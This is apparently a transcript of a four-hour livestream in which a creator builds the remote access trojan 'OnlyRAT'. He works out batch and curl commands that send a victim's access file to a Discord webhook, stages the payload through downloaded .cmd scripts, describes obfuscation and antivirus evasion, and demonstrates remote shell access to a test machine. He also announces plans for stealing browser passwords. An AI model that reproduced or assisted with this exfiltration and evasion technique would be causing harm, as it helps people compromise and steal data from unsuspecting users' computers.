you did the comma, whack, quotes, and then we'll do file, whack, quote, colon, whack, and then we'll do so instead of hello we'll do file.txt, whack, quote, delete, and that should work, right? Warning, illegally formatted input field. What do you mean it's illegal? Tag F is badly used here. Alright, can we do tag D instead? Is that what we need to do? Tag D. And then we just copy this whole thing. And then paste it. Your URL is using format or missing URL. Contains invalid JSON. Oh my god. So we have the opening bracket and the curly closing bracket. Then we do quote. Mate, I don't know. Like, I genuinely don't. Just found your channel about a week ago. Happy to see the content and watch the stream. Appreciate it, bro. Appreciate it. Welcome. I hate this, man. Content type application / JSON. Get command URL. Oh, is get command curl? That's is that PowerShell? Is that actual PowerShell? Get command curl. Yeah, but it just is an alias for invoke web request. It's not like an actual, like curl doesn't exist. Curl is commandlet for invoking web request. Yeah, so that's super weird. But CMD has curl, so we're going to do curl with command line, but like we still can't get the file sent to us. Command prompt. Oh, got you, machine man. I need to figure this out, man. This is like annoying, man. Payload _ JSON username test content hello file 1. Oh, so they use. Oh, I see. Let's try this. So right control and then the webhook URL. So let's have this at the end here. We'll close this and we'll close this. So it's all one line. So they do the curl tag F payload JSON content hello tag F file. We'll just file 1 equals. We'll just do file, and then at file dot txt. All right. So if we copy this and run this. Oh, so if we do CMD and then run this, unmatched closing brace. What do you mean unmatched closing brace? Could not resolve host test using bad illegal format, unmatched closing bracket, and URL position 6. Oh my god. So I see this. Right control. Payload JSON. Do we have to keep file 1? Is that like the file.txt, payload JSON, username, test, content hello. Because we're literally using pretty much the exact same thing that they're doing, right? So if we copy this and paste this into alright, maybe we should do. Alright, let's change this to attack capital F then. And just run this and see how that works. So if we go back into PowerShell and then the row, the command line option. Curl tech help. Can we do a tech force? Just tech force. Oh man. Alright, so if we do CMD, we do curl tech help. Tech F fail silently. What? That's not. So data should be the right thing. Oh my gosh, mate. I'm gonna spend the rest of my life doing this. We're almost at 3 hours, dude. What? For some freaking Discord webhooks? Oh my gosh, mate. Oh my gosh. I freaking hate everything. We literally cannot get this to work, and it's like blowing me. All right, what we'll do is create a new file. We'll call this we'll just call it what? Control S webhook.cmd, and what we'll do is run curl, and so PowerShell /webhook.cmd. Alright, so illegally formatted. Right, so what we can probably do now is with this, let's just literally just like excuse me. So instead of, we'll literally copy this into there. So now what we can do is we'll just delete this whole front line, and if we go into here and run webhook.cmd, oh yeah, so we don't actually have a cat dot, so we do file .txt, and then we'll just do file .txt again, honestly, because I just need to make sure this is going to work or something. HTTPS, or then we'll just include it as one command. There you go. All right. So cannot resolve host test. I hate everything. I do. Username test content hello. Could we just do file? Isn't it files? And then file.txt. Is that like too hard to ask for? And then this, can we just do that? Cannot resolve for host, URL bad, missing URL. What do you mean it's bad or missing? File.txt. Oh yeah, do we have to do that whole thing? So we'll do Control H, place all the double quotes with / double quote, and we'll just replace them all in here. All right, there you go. And then if we try that, unmatch close bracket in URL position 19. Oh, do we just put this in double quotes or something? Okay, it just echoed the damn thing out. Or we can take it out of quotes. Oh wait, hold up, something popped up in my Discord. It just did hello, which is the content of the file. Hold up. So if we do, alright, so it didn't understand it. Oh, so is it the quotation marks that is important? So if we do this, it runs that, and then, so it sent the file contents, but it's not. Alright, that's fine with me, honestly. That's honestly fine. That's honestly fine. Alright, so if we copy this and go into here, and then we'll just replace this. Nope. Where's our it's not what copy this whole thing. Control A, copy it. Hold up. Is share clipboard bidirectional. There you go. So let's copy this. Let's go over here. Are you missing a I was missing. I like how you don't give up and keep trying. Appreciate it, man. Appreciate it. That's why all my streams are like Christopher Nolan movies. They're just like super long. Are you missing a take F? Do you leave the dollar sign there, fellas? Time flies when debugging, guys. Yeah, on God. Your format needs to escape characters, maybe. Yeah, so basically, I was missing quotes. Can I paste this? There you go. I was missing quotes around the freaking JSON stuff. But that basically works. So instead of file.txt, we need to do $, this thing. $, crying, whatever, this thing. And that works by itself, right? So I don't actually need to do this whole thing, right? No. And then, yeah, we actually don't need this either. And then we actually don't need that either. So we can do this, and then, so username just needs to be config, and then content. Oh, it's not working. It's not working. Because the freaking content is hello, but it's not attaching the files. Dang it, man. Ugh. Why is it not working? Because it's just doing the hello. Wait, so that means if we just do tech F and then double quote, and then we just do file. Oh, I hate how I got so excited too. I was like, dang, it's finally working. So file equals the file, right? So file equals at file.txt. Alright, and then I'll just say world in here just so we have some differentiation. If we run this, webhook.cmd. Alright, we got a bunch of stuff. World. Oh, is this the file.txt? Yes! Yes! Oh my God. Oh my Lord. It freaking got the file.txt right there, and you can freaking download it. You can freaking download it. I'm not gonna download that shit. Oh my. Oh. We still haven't gotten it into the actual OnlyRAT, but the proof of concept works. So, oh my God, dude. Oh my God. Programming sucks. I don't know why people chose this as a profession. This makes no sense. Especially malware development, because all the code's obfuscated and everything. It's just ass. It's terrible. Oh my gosh. Alright, let's keep going. Ugh. This is terrible. I don't know who thought this was a good idea. I don't know what I was thinking when I started this project. I was like, oh, you know, making a rat would be easy. Pretty cool. It's not easy. It's not cool. So let's get the theme we just made off of our virtual machine. Yeah, so control. So we don't actually need this. Can we get rid of this? And we just need this, right? I did something. I think I broke it. Alright, yeah, there you go. Alright, so we'll delete this. and then tech file add file.txt. So yeah, this is a code that actually works. If we go in here real quick, oh yeah, we need to go into CMD and then run this. Yeah, so if we do that, in theory, right, it sends us the file.txt. Perfect. All right. So all we need to do now is oh, awesome. I love the hype in the chat. Yeah. Let's go. Thank you, guys. Thank you. Oh my gosh. So let's get this onto here. So command line this. All right, and we're basically replacing this with that. All right. So now all we need to do is replace this with the variable that represents the thing. So it's like pay this thing. Yeah. So this variable is our URL. So instead of file.txt, it's going to get the name of, can we put $? How can we put, can you concatenate variables? How do you concatenate in PowerShell? I forgot. Because I'm going to honestly just have it do $. Alright, so what we're going to do, because it's going to be like file is equal to @ and then $cry NRK ADBE. Yeah. So that's it, and then that's the URL. Alright, hopefully this works, because that's the username.rat file. Alright, let's try this, guys. Let's try it. Oh my lord, this is test number 6, technically number 7, but you know. My freaking god. So let's minimize this. Alright. I'm going to delete all those. So our Discord webhook command line file, kind of just sit back and watch it break or some dumb stuff. I still have one to send you, the PS version. I was figuring out to see if it actually works. Oh cool. Have you already implemented obfuscation? Are you doing? Yeah, so most of it is obfuscated already. But you know, you can always do more. Alright, so in theory it should be done. If we go in Discord, I don't think that's it. Yeah, that's not the rat file. So something went wrong. Which is fine. It's fine. We're closer, guys. We're closer. I honestly think this is probably the issue. Or if we actually go in the virtual machine, we can actually see open with code. Open. I trust it. Alright, so first of all, did it actually transfer right? Did it actually yeah, so it has the file at cry narcomid. Alright, so content world file. So what we'll try doing is we'll just do $test is equal to quote file equals at, and then we can add it to add the $cry narcomid or something. Right, so that's the, so in quotes, we can do $test, right, and then this thing needs to, out string or something, just make sure. So we can probably just run that file, actually. So we'll run with PowerShell. Oh yeah, we're not root. Yeah, I forgot. Oh my gosh. So I said we're not root. We're not. We don't have an admin PowerShell. Let's close this PowerShell. All right. What we need to do is right-click, run as admin. Yes, run as admin. Oh, look how disgusting this PowerShell looks. Let's key up. There you go. Alright, so what is it? How do you guys do this again? Set execution policy. I also forgot to do this. Set EP bypass. Is that how you do it? I honestly don't remember. Alright, let's go into, so cd do double quotes. Alright, so if we do dot slash the K thing, alright, so hopefully that will this will work. If not, you know, I'll just cry or something, but it's not that big of a deal. I remember who was asking earlier, but now you can actually see the PowerShell being run. I think it was 202 who was talking about maybe you should, you know, make it so it's not hidden. And I was like, yeah, it's a great idea. Well, there you go. You actually got to see it a little bit. Can we check Discord? No. Why is it not working? Why? All right, so we're going to take this code that we have right here, and we're basically just going to like completely like. All right, I'm going to basically remove everything from this code and make it so that way it only does the stuff we need for temp directory. We don't even need the temp directory. Do we even need the get location? Alright, we do need the get location. Alright, so everything from like here and up, do we need this temp directory? No, we don't. Alright, so basically everything from here and up, I'm going to delete. Alright, awesome. So, and then everything after this curl, I'm going to also delete. Whoever was asking about the obfuscation in chat, you can kind of see like, you know, the weird names and stuff. I never did full obfuscation, but I will towards the end when it's just like super impossible to read. I just needed to be mildly obfuscated and mildly impossible to read. Alright, mate. Let's figure this out, guys. Let's figure this out. I'm surprised people even watch my content. I genuinely am. This is so like mind-numbing. So if we have our test, so let's try running that script. Let's just do the dot slash. All right, a legal format or something. What seems to be the problem here? Is it the outstring? Is that what's doing it? What I'll probably do is just add all of these into our PowerShell. So if we do, awesome. So then what we can do is this. So why is the why is this one command not working? Legal format or missing URL. Is it the URL? But this gets the content of, like, yeah, if we run $ this, it gives us the URL. See what I'm saying? See what I'm saying, yo? This is racist or something. I don't know. So get content of that law whatever .txt, and then that's law if it's, yeah, that .txt. So and then test, right? If we do a $ test, it's equal to file equals redrow.rat. Yeah, so that's fine. The only thing is, I guess, just the So let's run this command as it's supposed to be ran, right? So if we took our cmd whatever, so instead of that test, I'll just do the red row, or the file is equal to at redrow.rat, and then I'll take this, and then instead of that, I'll actually put in our web URL webhook. So let's copy this and then paste this. So if we run that, redrow.rat. All right, so it's just having problems with the variables. So it actually, it sent us the redrow.rat file. See, look. So if we save redrow.rat into our downloads, and we'll just cd into downloads, and now cat redrow.rat. Yeah, so it works, but it doesn't recognize the PowerShell variables. How do we fix this? Because it's not recognizing these, I think. You go through the same struggles. It's good content. How do you get this past antivirus? Are you going to encrypt? So eventually I'll do some encryption stuff. But for the most part, it does just a lot of evasion. And it's like super staged, right? So yeah, you guys don't actually see like the full thing. So when that Discord.cmd thing we run, it's a very simple script, right? Because all it does is downloads another file. So antivirus doesn't look too much at this. Obviously this is the most important one because we can encrypt it. But after you run this one, then it will run the DW one, and this gets admin permissions to do the rest of the stuff. So basically, like, yeah, antivirus could detect it. First of all, it's not. But second of all, it doesn't matter because it's being run by a user the program runs itself with admin permissions. So that way we don't have to worry about anything. It's like, it's like tricking the antivirus, I guess. That's kind of a better way I can explain it. We can close this. We can close this. So when we get content of that text file, so I think it's confused on like, yeah, can we run PowerShell, right? So how we ran this, can we run this and expect it to work? Yeah, because it doesn't understand the URL, doesn't it? Because it still sees these as the thing that's being parsed into here. Can we do like invoke expressions? How it works? I don't think that's even going to work at all, but you know what? Invoke expression, yep, that's what I'm saying. Because I was hoping to see if we can get those variables in here. Oh, maybe we can just save this as a variable. So we can just do payload equals, alright, and then can we just invoke expression? Can you save your variable or can you save your URL as a variable? Yeah, that's what we're trying to do. But the problem is that when it tries to run it through the command line, it gets confused. Oh, do I have one S here? Whoops. It is null. Don't we invoke stuff in the how did we do this? Invoke, and then yeah, so invoke the dot slash. Ah, my gosh. Yes, invoke expression was part of my header. Yeah. All right. So I'm not too far behind of what I'm trying to do. I'm so sorry, guys. The code's like half obfuscated, so it's like super hard to read. This is super hard for me to read it too, so don't feel that bad. All right, because we know it can work. The only problem it's having right now are the variables, right? So I'm saying if we can save this to a variable. Oh, do we have to invoke? So invoke expression $ payload. Right, so if we copy this line, paste it. See, it gets confused with those variables. Alright, let's see if we can pass PowerShell variables into command line. So $A equals read host, right? That's A. So parameters. Oh no, not parameters. No, not into like the command line. I meant like into batch. Pass PowerShell variable to batch scripts. That's close enough. So $A equals get date format blah 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 start process. So report, new report, whatever. Echo off, whatever. Oh, we could save it to like. Oh. Wait. So I'm loving a new problem I don't deal with daily. Best need stream yet. These will teach you more than flying through successfully. Yeah, no, most definitely. If you watch like any of my streams, you'll watch like the first 3 hours of it. It's just like me struggling, and then the last 30 minutes is seeing that I had a period somewhere that just broke the entire thing. So I think I know how we can fix this actually. We'll just have it instead of using the what do you call it, PowerShell variables, we'll just use batch variables. I don't know how I didn't think of that earlier, but you know, it's fine. All right, so how do you read files in batch? Isn't like you type list. Can we oh wait a second, we don't even know if this works or not because we don't have a file.txt echo file into oh actually no, we do know it works because we're trying it on redrow.rat. Okay, wait. So how do you, if we did type redrow.rat, all right, perfect. That's all I need to see. Type. So what we'll do is type. How do you get the username again? So if I did type percent sign username dot rat. Oh yeah, this is we need to do CMD. Alright, there you go. Clear, or CLS. There you go. So let's figure this out, guys. So what we need to do is actually, you do how do you cat out files in command line or in batch? When you do type and then the redrow.rat. Alright, there you go. So that's how we get the content. So can we do type, and then we can just do percent sign username dot rat. All right, that works. All right, so all right, you know what is even better than this? Freaking hold up. So we need to save content of file to vary. Oh wait, do we need to actually hold up? Let's see what variables we need to replace. We need the name of the file, right? So if we actually just echo, hold up, CLS, right? So if we echo percent sign user name dot rat redrow.rat. Oh, so what we need to do is curl. All right, so right before we curl, we'll do file, and then, or how do you concatenate strings in batch? Is it the same in like every language? I feel like batch is different. Hold up. What we need to do is concatenate batch. So set, honestly, we'll figure this out as we go. So let's get the file name, which is percent sign. Honestly, we should probably open up the Discord webhook installer. Yeah, because we save it in double quotes, right? So yeah, we can still do the percent sign and just do username in here. Right, so file equals and then percent sign username, just like how you do it there. All right, perfect. So now we need to do is output it. Yeah, so if we do set, I'll just do path for now. How do you get, so set path equal to, oh, got you. So instead of CD, we'll do type and then the name of our file.txt. So type this.txt. So in theory, so all we need to do is get the, so instead of $sign this, we can just do percent sign, and then copy, and then paste. So if we copy this, and then go into here, and paste, and then go into Discord. I don't know if this is a new one or not. I'll do L. Alright, I think we're close, guys. We are close, because, like, oh, I didn't do the and, hold up. So, type, hold up, where did we type this in? What, alright, cool. So, cmd / this. So yeah, and then after this we have to do the and curl whatever. So let's copy this and then go into PowerShell .cls failed to read from file application. All right, if we go in Discord, yeah, okay. So we're close. All we need to do is be able to read the file. So save file content to variable batch. I'm sure I searched this up like earlier, but read content in a batch file, yeah. Set/p build equals to version.txt. All right, perfect. So we'll just do that. So we'll do all right. So instead of version.txt, it just needs to be so username.rat, and then we can do. Oh, is that why it didn't work? I didn't have that right there. It doesn't matter. So instead of build, we can just do. Oh, we'll keep build for now, and then we'll just do the. What's the name of the file again? Law.txt or something. So do that gets the content of that law.txt file, and then it'll curl the username test content equals world tech f, and then the file equals the username dot rat, and then we can just do %sign build. And if we copy this and then go to here, why is that host not resolvable build %sign build %sign? What do you mean? So build equals to law.txt. Use copy to. Oh my god! All right, use copy to con to create example.txt. Then type the contents. Then press Ctrl+Z. Copy con to create. I am not familiar with your funny words, Magic Man. Oh my god, this code hurts my head. So it does the and curl tag f payload JSON username world file equals this thing dot rat. Or what we could do is we might need to concatenate something like this. All right, so let's just say we'll say path, and then we'll say set path equal to file equals ampersand, and then a little plus sign, and then %sign username, and then dot rat, and then and so that way we can just do path. So here we can do tag f %sign path. So if we throw this on PowerShell, set is not represented. Oh, let me just fix this real quick. So where's set %sign set? Oh yeah, that's not right. All right, let me copy this into like the webhook.cmd. Yeah, perfect. All right, so cmd/set path equals this thing plus username. Oh, so yeah, this needs to go here, and then add build equals this. And all right, so let's run this in here. Warning: format was illegally inputted. All right, so there's something moderately wrong with what we're doing. So path equals this, and then Hold up, let me just do this in the command line. So do this and then %sign path. Oh, can we echo it? Echo. Oh, got you. So I forgot that batch is weird like that. All right, let's try this. So if we paste this, CND is not a, what do you mean? CND is not recognized as an internal whatever. All right, then just do this then. Curl is not recognized. What do you mean curl is not recognized? Don't even play with me right now. Don't you play with me right now. Curl is recognized. I don't know what you're talking about. So file equals ampersand 10% user set this thing and then curl tag f. Oh my gosh, bro. I freaking want to die right now. How long have we been streaming? 3 hours and 20 minutes. All right, I'm going to stop at like the 3 hour 45 because, you know, I got a life. That's a lie. Let me keep working on this. Command line /c set path equals file username .rat and then set /p build to this thing and then alright, so let's go over here. If we run this and then echo %, whoops, where is it? %, build. Alright, so that works. Awesome. So that works. I don't have to worry about build. How about this thing? So let's paste this into here. And if I have to echo %, path, that works. File equals @redrow.rat. Awesome. So if we had this variable and then we set this variable and then we run payload JSON equals all this with the %, path, and the %, build, that should in theory work. So let's copy this and paste it and run it and why are you not working? All right, so if we paste curl's not recognized. All right. All right. How do you, guys? I'm so lost. Like, if that worked, why won't this work? So maybe we can cut ourselves some time and use that as the path. So and then just use that % build. So let's delete this and see how this works. So if we copy this, throw this in here. When crow's not recognized. Oh, it might be. It might have to do with this command. Maybe we need a better way to read the file contents. I just need to read type. Oh, is that what it is? Or can you save? Oh, you just save the output of the type command. So type version.txt. So, oh yeah, but can you save the output of commands in batch? Save output of commands to variable batch. Bro, this is blowing me. All right. Is it possible to set statements output whatever? Yeah. I just need single one line cmd temp file. No, mate. Set/p variable and then to read file. So that's what we're doing right there, right? So yeah, this is what we're doing here. So set/p variable is equal to, and then the name of our file.txt. And then we used it later on. Unless if we did the oh my gosh, man, this is so annoying. File equals username dot rat. What happens if we run this again? What if we run this in PowerShell? PowerShell, because we're already starting it off with PowerShell. Oh, is our Windows like just broken? Like, let's open up a new freaking PowerShell. Maybe that's what it is. So we just do this. And separator. But this is command line. How do you separate commands in command line? D separate commands in PowerShell. Oh my gosh. Alright, so oh, not PowerShell, sorry. Batch. There you go. Separate commands in batch. Oh, you just do a single and statement? Is that seriously what it is? My code may have been working this whole time. I just would have known because I'm dumb. Alright, so instead of double, we just do and. So set path is, oh yeah, this is the old version we made. That's wild. Yeah, my code literally could have been working this whole time and I would have never known. Like if we run this in our PowerShell, this doesn't work. Alright, awesome. So let's try our other one then. So get rid of this. So it still doesn't work. Why? The ampersand character is not allowed. To pass as part of a string. Alright, so if we do cmd and run it, fail to open read local data from file. Oh, because we're not in that directory. So if we cd into the startup directory, where's the startup directory? Ooh, go back, please. Thank you. Control C. So if we just do 2 double quotes and this thing. Alright, awesome. So if we clear. Oh yeah, so like that code literally just like breaks. Oh, we're in command line. I'm dumb. No wonder it's not working. So instead, let's just, can we just paste the thing in here? Oh, whoops. Cannot resolve host build. Yeah, so it's not getting the name. So we need to do Google copy con. Yeah, I will. Copy con. What is copy con? MS-DOS, Windows command line. Allows the creation of file. The command line to use this command copy con. Name of the file as below. So it just makes a copy of it. Copy con. Let me read your thing. Use copy line to create an example.txt, then type the contents, and then press. So the thing is, like, if I type the contents, where's like, yeah, I could, right? Because right now all we need is to get is the path, right? So we could type the contents of our thing, but I want that could percent sign build. I don't know how you get the output of like output like this. Is that how you do it? Set, and then let's go in webhooks here. So we'll do the single ampersand because I'm tripping, and then so instead of CD we just do type, and then the name of that law file. I keep losing. Let's go over here. It's probably somewhere in here. Yeah, law something.txt. So we'll go into here .txt, and then we just do so if we go over here and run this, oh yeah, so it didn't, like, it didn't pull up in here. Oh my gosh, mate. Because we already have the file, we can just type it out. But like, what does that even do? Let's if we do this and then paste, right, and then we just do %sign on this variable name right here. Oh my gosh, stop copying everything. I just need, yeah, copy this. So this just equals to type. Oh, how do you oh my god, we could do the set/p thing, and then just have it equal to set/p. Let's call it file. Let's call it path. Actually, path is equal to this thing, .txt, and then we just need to curl it, dude. Because this thing is literally just your webhook that's getting from that file. Man. Cannot solve for host type. What do you mean? I'm not even using the type command anymore. Oh, I'm still using this variable, aren't I? So path. Oh my gosh, CLS. Just paste it. So it said cannot resolve this URL, something like that. I freaking hate this, man. How long have we been streaming? 3 hours and 30 minutes. Oh yeah, first stream in over like a week and a half, and we're off to a great start. Definitely. Payload, username, test, content, world, file equals the %sign username.rat, and then the path needs to be equal to the contents of this. Can we do like type law this thing.txt and just hope that works? Cannot resolve host type. So yeah, this just needs to be the URL. How do we get the URL there, man? This is like 50 shades of annoying. All right, let me think. Can we like isolate this area right here? Like, can we put it in quotes? I don't know if that's going to do anything. Cannot resolve for host. Yeah. But like, if we put the URL there, it's going to work fine. So all we need to do is maybe... %, path, %. Right, so file equals this, and then the path. But like, if we go back into like PowerShell and then paste this in here, it's gonna have no idea. And it's not allowed, but we're using command line or command prompt. All right, is it only CMD, or is there like a longer syntax that Windows prefers? I need to think this out, because like when we do CMD/C, honestly though, like I low-key might just make this a file and then have the installer download it and run it. So what we could do, if we wanted to do that, oh, let's do that. Let's make it a separate file. Oh, how did I not think of this? Okay. Oh my god. All right. So, we'll delete this. Whoa. Delete this. All right. So that's the code, right? If we just do separate lines, so we'll do new line or new file. We'll do the send to webhook.cmd, and then paste this in here. Yeah. So here is where we need to actually incorporate the ability to run the file. So all we need to do is download it and then run it, right? So something like this. So we'll download, instead of hi user that it will be Discord tech or was it send to webhook.cmd, and then it'll output it as let's do test dot cmd, and then what we'll do is /test.cmd. All right, and then here this is sent to webhook. So what we're doing here is making this is the separate file. So cmd. So we actually don't need to do the cmd/c either. We can set I/p to that file and then curl this. So if we did this, so let's do Control N, V, S, and we'll just do test.cmd, and then go into, oh yeah, where did we save that test.cmd? Yeah, we're gonna have to move that test.cmd. So let's minimize, and minimize. What we're gonna do is take this test.cmd and move it into here, and if we run this and then go into Discord, it still didn't work. Which of our PowerShells is in the startup directory? This one. All right, so we'll go into PowerShell again. PowerShell. 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 All right, you know what? This one is broken. That's fine. What about our other PowerShell? Where's this one? Oh, this one's in the startup directory as well. All right, cool. So can we do test SAMD? This curl is not recognized. All right, so can we save? So I feel like this type of thing is messing with the rest of the code. So instead, I feel like, all right, that's fine. Whatever. We'll just, all right, Control O. All right, so this. All right, my goal is to finish this in the next 20 minutes. Let's do this. All right, and then test SAMD. All right, so first things first, we need to actually try to see if we can save the output of the type command. So I literally keep forgetting how to do this. Save output of command in batch. Save output of commands. Store command output to variable. Perfect. So set process equal to cmd.exe. I just need to save, say store command output to variable. What? This should be saying command output to, yeah. So echo zz save to bla.txt, set /p vv equal to bla.txt, and then if you echo vv, oh, I see. So it's just that /p, save curl output. How can I run commands use batch and save the output? Yeah. We'll save the output to the text file the other way, right? Yeah. So we don't need this anymore. Don't need this anymore. Don't need this anymore. All right. So it seems like it's echo zz. Oh yeah. So /p and then the /p. And then instead of the text file, oh, is this what he was kind of saying? Save it to, oh, I see what you're saying. All right, so what we'll do is we'll echo %sign path. Let's see how that looks. We'll comment this out. So let's go over here and run test.cmd, and then you can see it echoes. Okay, so let's do add echo off at the top too, so that way we can add echo. There you go. And if we run this, it will show us. Yeah. All right. Perfect. So it gets the webhook. Now what it needs to do is just run this curl command with this tech-f, and then I'll even do, so we'll do set, and then I'll just do rat is equal to this thing, just in case if it's going to be weird and such. All right. So now we'll echo %sign rat %sign. Actually, let me keep that commented still. So it gets file equals at redroad.rat. Awesome. So all it needs to do now is curl, and then it'll do %sign rat %sign and then path. So all right, so curl won't work after we run something like this. So what we need to do is figure out Because after we run this command, everything else stops working. Save curl is into output. Oh my gosh, man. Echo hi. Oh yeah, I know this thing. Oh, I see. Alright, I need to figure this out, guys. Save output of a batch file to variable. I need the opposite. How do we... Provide simple test echo that just got for F such tokens, A do set output A. Alright, you know what? We're gonna try this. We'll try this and see how this works. So we'll comment this out and tokens equals. So what is the variable name through this? So echo %sign output. Alright, so output should be, so instead of output, we'll do path. So let's see if this still runs. A was unexpected at this time. What do you mean A was unexpected, dude? Path equals 2% sign. Oh, so instead of test.cmd, we need to do oh my gosh, man. For tokens equals. Oh my god. Yeah, this stream started off so good. It really did. It really did. But I believe we can do it. Because we did it right earlier. But the only problem is we can't get the webhook. Oh, can we get arguments? Oh, can you run batch with arguments? So that way the PowerShell can just append it for us. Batch run batch file with arguments. Because if we can do that, then that way pass arguments off to a. So set arg1. Oh, we can do it. Oh. Alright, hold up. I need a fake. I need easy. Here's how I did it. Add fake command. Oh, wait. I need like something a little. Okay. If you want to intentionally handling miscellaneous parameters. Oh, got you. Okay. So let's say. Let's take this stuff. Got you. So what we're going to do is have it have an argument, and then our PowerShell will get that address, right? So this right here, and then when it runs that test.cmd, it will just add the address, which is this address right here. Got you. So when it comes to this, all it needs to do is have it so that way, so we don't actually need to read this anymore. We can just have it get this. All right, let me see if we control X, fake command /u arg1. So set arg1 equal to %1. got you. So what we can do is, I'll keep that shift there. I have no idea what that does. But now if we just do this, and then we'll just do this, so that way when we run this, we can do %, arg1, %, right? And then add echo off. Alright, so let's see if this runs. Control A, copy. Technically, I guess it needs to be in here, right? So our test.cmd. Let's try this. No URL specified. Oh, so now when we have the, so let me copy this. So when we run this and then add my URL, it does this, goes to Discord. Yes! Yes, dude! Oh my lord. Holy mother of something. Oh my god. What's up, Mati? Welcome back. Yun. Oh my god, dude. Oh my god. Man, it freaking sent it to us. Alright, so all we need to do is tweak it. So, let's copy all of this. Where's our test.cmd? So Control A, we're going to copy this. Alright, and then this needs to be the code for our, and we made it, I know, right? So, when we go to our dw.ts2, or it's going to do send to webhook, let's quickly get that randomly generated text, so that way it can be moderately obfuscated. So instead of saving it as a test.cmd, we can do this, and then we can do /this cmd, and then this is going to be the address. And that should work. So let's push this all to the GitHub. Git update. This is going to be test number 7. It's actually technically number 8, but it's alright. Or more than 8, because we've been doing multiple tests. This is just the GitHub. So if we delete all these, let's make sure I actually edited the right thing. Yes, we did. These don't delete yet, which is fine. But that should hopefully to God work. Oh my lord. Alright, so let's run the Discord webhook thing. Oh my god, dude. I'm so tired of this freaking You have been busy. Understatement of the year, mate. How long has the stream been? 3 hours and 53 minutes. Alright, and if we check Discord, I have no idea. Actually, I don't think that sent to us, did it? Mate, did that not work? Why did this not work? I swear we just got it working. Open. Let's code. I swear there's something small that I just forgot to do. It's always something small that you forget to do. It should have the send to webhook in here as this thing right here. If we edit this, yeah, so that's the send to webhook. So it got it for us, and then our where is the, so it does this and then it adds on the URL. Alright. I'll file this thing.cmd and then runs the thing.cmd with the content. So if we, oh my Lord, guys, this is, I hate everything. Why I'm confused is why it didn't work, right? So if you run this, it's not going to work, obviously, because you need to add the argument, but we add the argument, no? So like if we run this with, right, so we're going to do a dot slash and then LNA, whatever, right? And it's going to say, hey, no URL was specified. So if we go into, do we have like our test.ps1 here? Yes, we do. So let's copy this. And if we do this, did we not copy? All right, please, universe, please, universe. Why is this not working? Why can't I copy that dang URL from this code, dude? Copy. I swear, dude. Devices, share clipboard, disabled, devices, share clipboard, bidirectional. All right, let's try this again. Oh my gosh, why is this? Virtual machine. Oh my Lord. All right, bro. If you want to be like that, you can be like that. All right, let me just, just find it somewhere else. Here it is. So if we run it with this, it's going to send it to us, right? If we look in the Discord, yeah, so it sends it to us. Awesome. But the problem is the PowerShell. Can we add, when we run it in the PowerShell, it's not adding the argument. So like if we go into startup, right, there's this thing of most code. So yeah, it adds this right here as a additional argument, right? All right, let me copy this and paste this into here. Awesome. So now let me copy this and paste this into here. Bad URL is bad, illegal, format missing from URL. Okay, so get content. So why is the get content version so bad? If we echo $, this thing, that looks fine to me. Should we output it as a string maybe? Like if we do this, that txt, and then let's just out string, right? So now if we do it, oh, is that what we need to do? Out string? Is that what's going to make it work? So if we do out string. All right, so if we check the Discord, it should send a new one, right? Yeah, so send the new one. So separate it so that way I can tell the difference. So if we go on our actual one, right? Whoa, stop. So over here, and then when does it read this? So we just do out string, and that should be good, I think. Hopefully, fingers crossed. God, please. So yeah, let's run this thing. I'll go ahead and do test number 8 officially, and then we can go over here, and then we can minimize. We'll select all of these and delete. All right, and then please, Lord, please, Lord, please. All right, I'm gonna get a drink of water while this does this thing. Oh my gosh, man. Can't wait to eat food or something. Hey, we hit the 4-hour mark. Oh, Lord. Alright, so if I check Discord. Yes, dude. Yes, dude. Oh my God. Oh my God. It actually legitimately works now. Oh Lord. It actually legitimately works now. Oh my Lord. Like, there you go. Test world. You can even download redrow.rat. Save will replace the one that we just had. And if we right, if I control L, cat redrow.rat, there you go. There you freaking go. Oh my Lord. We can actually use this too, right? If we CD into our home directory and just move. That was a super dumb idea, but if we do OnlyRAT, and then redrow.rat, if we do our OR console, yeah, so it's going to say that stuff. So we just need to do SSH tech keygen tech F slash home slash. Oh, I'm pretty sure you can just do the fix OR console or fix OR console. I forgot how to do this. SSH tech keygen tech F. Alright, and then we just do this. Alright, so /home /blue cosmo .ssh /known hosts tech R, and then 192.168.1.50. Alright, so now if we clear, alright, let's try this. So if we do OR console not found, can I see the target? What do you mean it's not? Alright, that looks like a problem on this end for real. Oh yeah, that's right. You need to do SSH. Hold up. I remember what we need to do. Config. Alright, and then SSH into OnlyRAT at 192.168.1.50. Yes. And then the password is KIOC. Yeah, there you go. Alright, cool. So we could do Control D, exit. Yeah, alright, so we have remote access now. So if we do OnlyRAT with our redrow.rat, if we do our OR console, there you go. So we can do PowerShell, and if we list, we have access to the computer. Oh my God. Real quick, I'm gonna do a real quick tweak. You guys just said, yeah, I'm gonna do a real quick tweak and just break the whole thing. No, so we're just gonna say username is config, just so that way the user knows. Configuration, and the text is, and then this is your configuration. Or I'll just say download. Can I do multiple words? I don't know if that's going to work or not, but I honestly don't even want to risk it at this point. That's it. I'm going to just put that in there, and then Control-Shift-X, and then we can, there you go. We can say Discord webhooks. There you go. Alright, then we can Control-C out of here. How do you do this? Exit, and then exit, and then exit. Alright, cool. Oh my gosh, we actually have remote access to the computer, and we can actually use OnlyRAT on it and install malware and stuff on it now. And it sends it to us via Discord. Super cool. Alright. It's been enough of a 4-hour stream, mate. So I'm gonna take a final sip of water. Cool. My brain hurts. Everything hurts. But we made it. We did it, guys. After 4 hours, we did it. Definitely appreciate you guys for joining. Join the Discord server. We have a Discord server. It's linked in the description as always. So if you guys want to, hit me up, talk to me, ask questions about, whatever I've been doing this past 4 hours, definitely do that. If you guys actually stuck around for the 4 hours, I'm disappointed in you. Do your homework or something. I don't know why you're watching my content. But we did it. We got Discord to work. And next stream, I think we're doing like web exfiltration or something like that. I can't remember. It's on the roadmap. We're stealing data from computers, basically. We're getting like their web browser passwords and like bookmarks and all this other crazy stuff. But that felt so good to finally get done. But I also just want to die. So I will see you guys in the next one. All right. So stay happy, stay positive, and as always, happy hacking. Hey hackers, Blue Cosmo from CCS here, and I wanted to introduce you guys to the Happy Hacker Site Plan. The Happy Hacker Site Plan is a plan where you guys can support us for only $1 a month. That's right, $1. With this comes exclusive benefits like courses, articles, videos, and access to our entire cybersecurity knowledge base. If this interests you and you guys want to get access to all this, check out the link in the description. It's only $1, so we definitely appreciate your guys' support. Anyway, enjoy the video and happy hacking.